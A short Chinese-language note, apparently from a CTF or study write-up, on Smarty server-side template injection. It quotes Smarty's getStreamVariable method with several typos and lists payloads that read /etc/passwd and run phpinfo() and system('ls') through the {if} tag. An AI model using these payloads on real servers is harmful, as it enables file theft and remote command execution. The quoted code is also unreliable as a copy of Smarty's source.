通过self获取Smarty类，再调用其静态方法实现文件读写

Smarty类的getStreamVariable方法的代码

public function getStreamVariable($variable) {

$_result = '';

$fp = fopen($variable,'r+');

if ($fp) {

while(!feof($fp) && (current_line = fgets($fp)) != false){

$_result .= $current_line;

}

fclose($fp);

return $_result;

}

$smarty = isset($this -> smarty)?$this->smarty : $this;

if($smarth->error_unassigned) {

throw new SmartyExcption('undefined stram variable ""'.$variable.'"');

}

else {

return null;

}

}

这个方法可以读取一个文件并返回其内容，所以我们可以使用self来获取smarty对象，并调用这个方法，很多文章里面给的payload都形如

{self::getStreamVariable("file:///etc/passwd")}

{if}

官方文档中这样描述

Smarty的{if}条件判断和PHP的if非常相似，只是增加了一些特性，每个{if}必须有一个配对的{/if},也可以使用{else}和{elseif}，全部的PHP条件表达式和函数都可以在{if}内使用，比如|| 、 or 、 && 、 and 、is_array()等等，如{if_is_array($array)}{/if}*

既然全部的PHP函数都可以使用，那么我们可以是利用此来执行我们的代码

{if phpinfo()}{/if}

{if system('ls')}{/if}